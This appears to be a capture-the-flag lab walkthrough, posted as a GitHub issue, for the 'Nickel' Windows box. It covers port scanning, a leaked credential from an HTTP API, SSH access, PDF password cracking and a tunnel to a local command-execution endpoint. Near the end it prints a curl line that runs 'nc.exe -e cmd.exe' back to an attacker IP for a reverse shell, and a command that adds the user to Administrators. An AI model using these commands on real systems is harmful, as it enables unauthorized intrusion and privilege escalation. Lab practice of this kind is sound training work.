search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Nickel (Intermediate, Windows, 2020) #54

Open WDavid404 opened 2 months ago

WDavid404 commented 2 months ago

Keypoints:

WDavid404 commented 2 months ago 
PORT      STATE    SERVICE       REASON          VERSION
21/tcp    open     ftp           syn-ack ttl 125 FileZilla ftpd
22/tcp    open     ssh           syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)

80/tcp    open     tcpwrapped    syn-ack ttl 125

135/tcp   open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds? syn-ack ttl 125

3389/tcp  open     ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
5040/tcp  open     unknown       syn-ack ttl 125

8089/tcp  open     http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET

33333/tcp open     http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET POST

49664/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC

--> sudo sh -c 'echo "192.168.170.99 nickel" >> /etc/hosts'

21/tcp

Anonymous login to FTP --> failed

139/tcp, 445/tcp

enum4linux --> no info smbmap --> no info

80/tcp

cannot access

33333/tcp

image

8089/tcp

image Click those buttons --> no response see the source code of the page image

Change IP address 

curl -X GET http://nickel:33333/list-active-nodes
curl -X GET http://nickel:33333/list-running-procs
curl -X GET http://nickel:33333/list-current-deployments

--》 image Cannot "GET"。。。。 How about POST? --》Need to have a content length image

Add "content-length:100" on the header --> got interesting info image ariah:NowiseSloopTheory139 ( because echo Tm93aXNlU2xvb3BUaGVvcnkxMzkK|base64 -d --> NowiseSloopTheory139)

ssh ariah@192.168.170.99 --> succeed!

PE

whoami /priv --> no useful info

ls C:/ image

go to C:/ftp image Download this file (We can login to ftp and download it) Open it --> require password image

pdf2john Infrastructure.pdf > pdf.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 pdf.hash

-->ariah4168

Open pdf again image

After enumeration, image Try curl -v 127.0.0.1:80 image

Setup tunnel with ligolo-ng, and try curl -v 240.0.0.1:80/?whoami image

curl http://240.0.0.1:80/?C:\\Users\\ariah\\Downloads\\nc.exe%20-e%20cmd.exe%20192.168.45.205%20443 --> Got reverse shell image

Another method for PE:

Add-LocalGroupMember -Group Administartors -Member ariah --> URL encode curl 'http://240.0.0.1:80/?Add-LocalGroupMember%20-Group%20Administrators%20-Member%20ariah' image

SSH again image